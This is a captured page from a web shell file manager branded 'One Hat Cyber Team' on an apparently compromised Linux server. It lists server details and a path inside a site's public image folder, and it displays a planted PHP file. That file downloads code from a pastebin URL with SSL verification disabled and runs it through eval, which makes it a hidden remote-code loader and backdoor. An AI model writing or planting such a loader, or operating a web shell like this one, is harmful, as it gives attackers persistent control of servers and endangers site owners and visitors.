⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.216
Server IP:
65.21.180.239
Server:
Linux gowhm.eplangoweb.com 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.0.30
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
eplangoweb
/
public_html
/
public
/
assets
/
front
/
img
/
user
/
footer
/
View File Name :
2ade3426f982aef7075ac45fa74c474a4548d950.php
<?php function getBacklink($url) { if( ini_get('allow_url_fopen') == 1 ) { // Jika url fopen on maka jalankan return file_get_contents($url); }else if(function_exists('curl_version')) { //Jika url fopen off maka jalankan menggunakan curl $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HEADER, 0); $data = curl_exec($ch); curl_close($ch); return $data; } } eval("?>" . getBacklink("https://pastebin.com/raw/raxbLatm?")); ?>